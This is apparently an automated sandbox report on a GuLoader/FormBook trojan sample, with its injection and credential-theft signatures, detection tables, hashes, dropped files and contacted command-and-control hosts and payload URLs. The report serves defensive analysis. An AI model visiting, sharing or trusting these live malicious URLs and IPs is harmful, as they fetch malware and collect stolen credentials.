            Signatures on graph nodes: sample level: Suricata IDS alerts for network traffic, Multi AV Scanner detection for submitted file, Yara detected FormBook, 3 other signatures; Salmebogs(1).exe: Suspicious powershell command line found; powershell.exe: Early bird code injection technique detected, Writes to foreign memory regions, Sample uses process hollowing technique, 4 other signatures; Stemmeurnes.exe: Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, Maps a DLL or memory area into another process, 2 other signatures; MLvvJtVcRex.exe: Found direct / indirect Syscall (likely to bypass EDR); svchost.exe: Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc), Modifies the context of a thread in another process (thread injection), 2 other signatures.

            Source | Detection | Scanner | Label | Link
            Salmebogs(1).exe | 21% | ReversingLabs | Win32.Trojan.GuLoader |
            Salmebogs(1).exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | 21% | ReversingLabs | Win32.Trojan.GuLoader |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://www.thezensive.work/lo90/ | 0% | Avira URL Cloud | safe |
            http://www.topkapiescortg.xyz/vn7h/ | 0% | Avira URL Cloud | safe |
            http://www.carhireheaven.online/rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat | 0% | Avira URL Cloud | safe |
            http://212.162.149.63/kybqONxtMLpRGBHO51.bin | 0% | Avira URL Cloud | safe |
            http://www.dy01urj.pro/f425/ | 0% | Avira URL Cloud | safe |
            http://212.162.149.63/ta | 0% | Avira URL Cloud | safe |
            http://crl.mid | 0% | Avira URL Cloud | safe |
            http://www.lucelight.info/ygu8/ | 0% | Avira URL Cloud | safe |
            http://www.lucelight.info/ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat | 0% | Avira URL Cloud | safe |
            http://www.topkapiescortg.xyz/vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat | 0% | Avira URL Cloud | safe |
            http://212.162.149.63/kybqONxtMLpRGBHO51.bin_ | 0% | Avira URL Cloud | safe |
            http://www.dy01urj.pro/f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat | 0% | Avira URL Cloud | safe |
            http://www.openhorizons.pro/ir2n/ | 0% | Avira URL Cloud | safe |
            http://www.thezensive.work/lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.topkapiescortg.xyz | 104.21.6.17 | true | true | | unknown
            thezensive.netlify.app | 3.75.10.80 | true | true | | unknown
            www.lucelight.info | 103.168.172.37 | true | true | | unknown
            www.openhorizons.pro | 69.57.163.64 | true | true | | unknown
            carhireheaven.online | 165.22.38.185 | true | true | | unknown
            www.dy01urj.pro | 154.88.22.104 | true | true | | unknown
            www.carhireheaven.online | unknown | unknown | false | | unknown
            www.kevmedia.online | unknown | unknown | false | | unknown
            www.thezensive.work | unknown | unknown | false | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.carhireheaven.online/rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat | true | Avira URL Cloud: safe | unknown
            http://www.lucelight.info/ygu8/ | true | Avira URL Cloud: safe | unknown
            http://www.thezensive.work/lo90/ | true | Avira URL Cloud: safe | unknown
            http://www.topkapiescortg.xyz/vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat | true | Avira URL Cloud: safe | unknown
            http://www.topkapiescortg.xyz/vn7h/ | true | Avira URL Cloud: safe | unknown
            http://www.dy01urj.pro/f425/ | true | Avira URL Cloud: safe | unknown
            http://www.lucelight.info/ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat | true | Avira URL Cloud: safe | unknown
            http://212.162.149.63/kybqONxtMLpRGBHO51.bin | false | Avira URL Cloud: safe | unknown
            http://www.openhorizons.pro/ir2n/ | true | Avira URL Cloud: safe | unknown
            http://www.thezensive.work/lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat | true | Avira URL Cloud: safe | unknown
            http://www.dy01urj.pro/f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://crl.mid | powershell.exe, 00000002.00000002.3448936955.0000000002C26000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://contoso.com/License | powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://nsis.sf.net/NSIS_ErrorError | Salmebogs(1).exe, 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Salmebogs(1).exe, 00000000.00000000.2271359918.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Stemmeurnes.exe, 00000006.00000000.3447638821.000000000040A000.00000008.00000001.01000000.00000007.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Stemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmp | false | | high
            http://212.162.149.63/ta | Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://nsis.sf.net/NSIS_Error | svchost.exe | false | | high
            https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://212.162.149.63/kybqONxtMLpRGBHO51.bin_ | Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/ | powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdStemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
IP; Domain; Country; ASN; ASN Name; Malicious
IP:69.57.163.64; Domain:www.openhorizons.pro; Country:United States; ASN:25653; ASN Name:FORTRESSITXUS; Malicious:true
IP:103.168.172.37; Domain:www.lucelight.info; Country:unknown; ASN:7575; ASN Name:AARNET-AS-APAustralianAcademicandResearchNetworkAARNe; Malicious:true
IP:3.75.10.80; Domain:thezensive.netlify.app; Country:United States; ASN:16509; ASN Name:AMAZON-02US; Malicious:true
IP:165.22.38.185; Domain:carhireheaven.online; Country:United States; ASN:14061; ASN Name:DIGITALOCEAN-ASNUS; Malicious:true
IP:154.88.22.104; Domain:www.dy01urj.pro; Country:Seychelles; ASN:40065; ASN Name:CNSERVERSUS; Malicious:true
IP:104.21.6.17; Domain:www.topkapiescortg.xyz; Country:United States; ASN:13335; ASN Name:CLOUDFLARENETUS; Malicious:true
IP:212.162.149.63; Domain:unknown; Country:Netherlands; ASN:64236; ASN Name:UNREAL-SERVERSUS; Malicious:false
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1564415
                                                                Start date and time:2024-11-28 10:03:04 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 40s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Salmebogs(1).exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@10/12@8/7
                                                                EGA Information:
                                                                • Successful, ratio: 60%
                                                                HCA Information:
                                                                • Successful, ratio: 88%
                                                                • Number of executed functions: 157
                                                                • Number of non-executed functions: 63
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target MLvvJtVcRex.exe, PID 6620 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 5608 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: Salmebogs(1).exe
Time; Type; Description
Time:04:04:10; Type:API Interceptor; Description:38x Sleep call for process: powershell.exe modified
Time:04:07:06; Type:API Interceptor; Description:2915403x Sleep call for process: svchost.exe modified
Time:10:04:00; Type:Task Scheduler; Description:Run new task: {A4305397-4CCA-4818-9D94-369F4B660D06} path: .
Match; Associated Sample Name / URL; Detection; Threat Name; Context
Match:103.168.172.37
• Sample:firmware.i686.elf; Detection:malicious; Threat Name:Unknown; Context:103.168.172.37/
• Sample:Fzfee1Lgc2.elf; Detection:malicious; Threat Name:Unknown; Context:cloud.hgriggs.com/
• Sample:Documente de expediere.exe; Detection:malicious; Threat Name:FormBook; Context:www.jleabres.com/w977/
• Sample:jlsvOH1c8bSRKqM.exe; Detection:malicious; Threat Name:FormBook; Context:www.jleabres.com/blhi/
• Sample:eNXDCIvEXI.exe; Detection:malicious; Threat Name:FormBook; Context:www.celebration24.co.uk/mcz6/
• Sample:H25iQbxCki.exe; Detection:malicious; Threat Name:FormBook; Context:www.celebration24.co.uk/mcz6/
• Sample:Factura (3).exe; Detection:malicious; Threat Name:FormBook; Context:www.celebration24.co.uk/mcz6/
• Sample:PO0424024.exe; Detection:malicious; Threat Name:FormBook, PureLog Stealer; Context:www.celebration24.co.uk/pq0o/
Match:3.75.10.80
• Sample:oIGNK22EVW.exe; Detection:malicious; Threat Name:Unknown
• Sample:oIGNK22EVW.exe; Detection:malicious; Threat Name:Unknown
• URL:https://www.google.com/url?q=https%3A%2F%2Ftrimmer.to%2FPlfGc&sa=D&sntz=1&usg=AOvVaw1DTVuO2H6PM4yLoWCUd_D9; Detection:malicious; Threat Name:HTMLPhisher
Match:104.21.6.17
• Sample:INHSBC3W29006407_-_T01_pdf.exe; Detection:malicious; Threat Name:FormBook, GuLoader; Context:www.crashed.boats/ls02/?j2Md=BAvHs7FiF/mMvKQeHNkw3auVO7Mi81CusJrfc9abihgBy6gpaapEmgjs0/tKd+lX+MtJ&9r=XZLP9J_Xp
• Sample:HB-252-23.exe; Detection:malicious; Threat Name:FormBook; Context:www.crashed.boats/ls02/?2dqLW6k=BAvHs7EWEPj5waIbHtkw3auVO7Mi81CusJrfc9abihgBy6gpaapEmgjs0/BFCLdX56hcnU+qcw==&oJE0=YVMhn0jpRZeD3pY
                                                                      No context
Match; Associated Sample Name / URL; Detection; Threat Name; Context
Match:AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
• Sample:spc.elf; Detection:malicious; Threat Name:Mirai; Context:103.33.61.53
• Sample:arm.nn.elf; Detection:malicious; Threat Name:Mirai, Okiru; Context:103.162.17.26
• Sample:arm5.elf; Detection:malicious; Threat Name:Mirai; Context:134.148.54.103
• Sample:mpsl.elf; Detection:malicious; Threat Name:Mirai; Context:103.33.61.81
• Sample:spc.elf; Detection:malicious; Threat Name:Mirai; Context:103.166.98.133
• Sample:la.bot.mips.elf; Detection:malicious; Threat Name:Unknown; Context:103.183.208.4
• Sample:la.bot.arm7.elf; Detection:malicious; Threat Name:Unknown; Context:103.179.160.17
• Sample:la.bot.mipsel.elf; Detection:malicious; Threat Name:Unknown; Context:157.85.15.128
• Sample:nabarm.elf; Detection:malicious; Threat Name:Unknown; Context:103.161.199.61
• Sample:arm.elf; Detection:malicious; Threat Name:Unknown; Context:103.176.106.72
Match:AMAZON-02US
• Sample:botx.arm.elf; Detection:malicious; Threat Name:Mirai; Context:18.137.130.168
• Sample:botx.sh4.elf; Detection:malicious; Threat Name:Mirai; Context:18.153.222.87
• Sample:nabm68k.elf; Detection:malicious; Threat Name:Unknown; Context:54.64.252.235
• Sample:nabppc.elf; Detection:malicious; Threat Name:Unknown; Context:54.109.121.89
• Sample:Documents.exe; Detection:malicious; Threat Name:FormBook, PureLog Stealer; Context:52.60.87.163
• Sample:nabmips.elf; Detection:malicious; Threat Name:Unknown; Context:3.168.247.140
• Sample:nabsh4.elf; Detection:malicious; Threat Name:Unknown; Context:44.226.239.16
• Sample:nabarm.elf; Detection:malicious; Threat Name:Unknown; Context:54.126.138.72
• Sample:nabmpsl.elf; Detection:malicious; Threat Name:Unknown; Context:44.233.171.208
• Sample:nabx86.elf; Detection:malicious; Threat Name:Unknown; Context:54.171.230.55
Match:FORTRESSITXUS
• URL:http://dimfa.elcompanies.digitalillustra.com; Detection:malicious; Threat Name:Unknown; Context:65.181.111.144
• Sample:RN# D7521-RN-00353 REV-2.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:RFQ 3100185 MAHAD.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:RN# D7521-RN-00353 REV-2.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:INVOICE_PO# PUO202300054520249400661.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:TCP-F02-24-1437-HRSC24110281.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:Ponta Saheb. PO 4400049817.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:Indocount Invoice Amendment.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
• Sample:HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe; Detection:malicious; Threat Name:FormBook; Context:69.57.163.227
Match:DIGITALOCEAN-ASNUS
• Sample:loligang.mips.elf; Detection:malicious; Threat Name:Mirai; Context:167.175.208.27
• Sample:ppc.elf; Detection:malicious; Threat Name:Mirai; Context:162.243.214.132
• Sample:1ZFDEXA938MKSUBA.html; Detection:malicious; Threat Name:WinSearchAbuse; Context:68.183.112.81
• Sample:1ZFDEXA938MKSUBA.html; Detection:malicious; Threat Name:WinSearchAbuse; Context:68.183.112.81
• Sample:1ZFDEXA938MKSUBASJKA.svg; Detection:malicious; Threat Name:WinSearchAbuse; Context:68.183.112.81
• Sample:RFQ-00948-STELLION-878378.exe; Detection:malicious; Threat Name:Remcos, PureLog Stealer; Context:206.189.218.238
• Sample:jmhgeojeri.elf; Detection:malicious; Threat Name:Unknown; Context:178.62.248.126
• Sample:sparc.nn.elf; Detection:malicious; Threat Name:Mirai, Okiru; Context:167.71.167.230
• Sample:x86_32.nn.elf; Detection:malicious; Threat Name:Mirai, Okiru; Context:128.199.34.220
• Sample:la.bot.arm.elf; Detection:malicious; Threat Name:Unknown; Context:138.68.143.69
                                                                      No context
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):53158
                                                                      Entropy (8bit):5.062687652912555
                                                                      Encrypted:false
                                                                      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                      MD5:5D430F1344CE89737902AEC47C61C930
                                                                      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1239949490932863
                                                                      Encrypted:false
                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):552510
                                                                      Entropy (8bit):7.8978229070875745
                                                                      Encrypted:false
                                                                      SSDEEP:12288:rqxGbI7E2Rg+JZDFBRTvfN2fhepnatv8JvtHmv:U7E2RDn5BRTvEhepngMvh
                                                                      MD5:B5948D19A341BC22C750D129F41A55AE
                                                                      SHA1:D21D67D41F27ECA213FB81F2C5D68FDEE27D815D
                                                                      SHA-256:0F1EC8D7D4CF99BCE4BF482009F456A2E210C6D40D22802A196A2151170780EE
                                                                      SHA-512:4C0507EC93CC6BC82C718F09628EB9D7694F354BA3AE927EFFE2EB94B5A2CCFE8FD157FD3CF1BC69FE3B656F11921E83546C013452107C5DB4B0FC3D51C8C69C
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L....{.W.................b....:.....}2............@..........................p>...........@..........................................P<..............................................................................................................text...Ta.......b.................. ..`.rdata...............f..............@..@.data.....9..........z..............@....ndata........:..........................rsrc........P<.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale -26729-77, spot sensor temperature 0.000000, unit fahrenheit, color scheme 0, show spot sensor, show scale bar, calibration: offset 0.000000, slope 2048.035400
                                                                      Category:dropped
                                                                      Size (bytes):350486
                                                                      Entropy (8bit):7.5570059600895165
                                                                      Encrypted:false
                                                                      SSDEEP:6144:ScNZS0tKvJqZI58RBWx9mX8mCy4Aikv0W2bXZZqJsTgAK0WcuqCWZOlgm8q+Rmp7:ScG0tKvJq6SRBWx98bsZqJsfK0WcuTrZ
                                                                      MD5:ECEEDEA27D2BB3FB68ED94B01BEE1A0D
                                                                      SHA1:ECD156C2C1A68114616BF333352D8151409B67FA
                                                                      SHA-256:35E455D22077DF4A6B0F825B2DC99E464BCD2DBC7FEA888BF4596C1983ACD5CE
                                                                      SHA-512:51629DE133DB230A34F1DC8255A7872230BC7CE55697E0189A4564A53B1E46B119DC64C40CC2C52BCF9FBCC2F314A78382087E67890079DD6645A2932C587C7A
                                                                      Malicious:false
